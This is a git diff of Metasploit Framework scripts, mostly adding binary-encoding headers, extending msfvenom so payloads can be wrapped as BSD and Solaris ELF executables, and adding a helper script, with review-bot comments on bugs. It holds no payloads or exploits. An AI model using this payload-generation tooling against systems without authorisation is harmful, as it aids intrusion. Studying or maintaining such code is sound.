index b891c4204c..b3b7701f43 100755
--- a/msfmachscan
+++ b/msfmachscan
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
# $Revision$
diff --git a/msfpayload b/msfpayload
index 8a361a4ffe..e6bef308b5 100755
--- a/msfpayload
+++ b/msfpayload
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
# $Revision$
diff --git a/msfpescan b/msfpescan
index 90175220c6..33ce327765 100755
--- a/msfpescan
+++ b/msfpescan
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
# $Revision$
diff --git a/msfrop b/msfrop
index dfbc743ead..91283e5717 100755
--- a/msfrop
+++ b/msfrop
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
#
diff --git a/msfrpc b/msfrpc
index 422c091d6e..ffbfe9c594 100755
--- a/msfrpc
+++ b/msfrpc
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
#
diff --git a/msfrpcd b/msfrpcd
index 0388eb52e8..31b0196435 100755
--- a/msfrpcd
+++ b/msfrpcd
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
#
diff --git a/msfupdate b/msfupdate
index 8858ccfa13..e1d3af9a2b 100755
--- a/msfupdate
+++ b/msfupdate
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
# $Revision$
diff --git a/msfvenom b/msfvenom
index 038ede647d..7684938b86 100755
--- a/msfvenom
+++ b/msfvenom
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id: msfvenom 14909 2012-03-10 06:50:03Z rapid7 $
# $Revision: 14909 $
@@ -310,7 +311,7 @@ opts[:badchars] = Rex::Text.hex_to_raw(opts[:badchars]) if opts[:
# set the defaults unless something is already set by the user
if opts[:payload] != 'stdin'
opts[:arch] ||= payload.arch[0]
- opts[:platform] ||= payload.platform.platforms
+ opts[:platform] ||= Msf::Module::PlatformList.transform(payload.platform.platforms)
else
# defaults for stdin payloads users should define them
unless opts[:arch]
@@ -448,15 +449,31 @@ when /java/i
print_error("Could not generate payload format")
end
when /elf/i
- if opts[:arch] =~ /x64/
- elf = Msf::Util::EXE.to_linux_x64_elf($framework, payload_raw, exeopts)
- elsif opts[:arch] =~ /x86/
- elf = Msf::Util::EXE.to_linux_x86_elf($framework, payload_raw, exeopts)
- elsif opts[:arch] =~ /arm/
- elf = Msf::Util::EXE.to_linux_armle_elf($framework, payload_raw, exeopts)
- else
- print_error("This format does not support that architecture")
- exit
+ if (not opts[:platform] or (opts[:platform].index(Msf::Module::Platform::Linux)))
+ if opts[:arch] =~ /x64/
+ elf = Msf::Util::EXE.to_linux_x64_elf($framework, payload_raw, exeopts)
+ elsif opts[:arch] =~ /x86/
+ elf = Msf::Util::EXE.to_linux_x86_elf($framework, payload_raw, exeopts)
+ elsif opts[:arch] =~ /arm/
+ elf = Msf::Util::EXE.to_linux_armle_elf($framework, payload_raw, exeopts)
+ else
+ print_error("This format does not support that architecture")
+ exit
+ end
+ elsif(opts[:platform].index(Msf::Module::Platform::BSD))
+ if opts[:arch] =~ /x86/
+ elf = Msf::Util::EXE.to_bsd_x86_elf($framework, payload_raw, exeopts)
+ else
+ print_error("This format does not support that architecture")
+ exit
+ end
+ elsif(opts[:platform].index(Msf::Module::Platform::Solaris))
+ if opts[:arch] =~ /x86/
+ elf = Msf::Util::EXE.to_solaris_x86_elf($framework, payload_raw, exeopts)
+ else
+ print_error("This format does not support that architecture")
+ exit
+ end
end
$stdout.write elf
when /macho/i
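Review bot: The new platform chain under `when /elf/i` has no final `else`, so a platform list that is set but contains none of Linux, BSD or Solaris falls through with `elf` still unassigned. `$stdout.write elf` then writes nothing and the tool finishes without any error, leaving the caller with an empty file. Closing the chain with `else`, `print_error("This format does not support that platform")` and `exit` would match the way the unsupported-architecture branches already fail. This assumes the object assigned to `opts[:platform]` in the earlier hunk responds to `index`, which is not visible here.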
diff --git a/tools/dev/set_binary_encoding.rb b/tools/dev/set_binary_encoding.rb
new file mode 100644
index 0000000000..511e03b54b
--- /dev/null
+++ b/tools/dev/set_binary_encoding.rb
@@ -0,0 +1,28 @@
+#!/usr/bin/env ruby
+# -*- coding: binary -*-
+
+str = '# -*- coding: binary -*-'
+
+fname = ARGV.shift || exit
+data = ''
+done = nil
+fd = ::File.open(fname, "rb")
+fd.each_line do |line|
+ if line =~ /^#.*coding:.*/
+ done = true
+ end
+
+ if not done
+ unless line =~ /^#\!.*env ruby/
+ data << str + "\n"
+ done = true
+ end
+ end
+
+ data << line
+end
+fd.close
+
+fd = ::File.open(fname, "wb")
+fd.write(data)
+fd.close
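Review bot: The shebang test `unless line =~ /^#\!.*env ruby/` only recognises `env ruby` interpreter lines, so a file starting with any other `#!` line gets the coding comment inserted above it. That pushes the shebang off line 1 and the script stops being directly executable; `unless line =~ /^#!/` would skip every interpreter line. The file is also rewritten in place by reopening it with `"wb"`, so an interruption between truncation and `fd.write` loses the content; writing to a temporary file and renaming it over the original would be safer. An empty input file is written back unchanged because the loop body never runs.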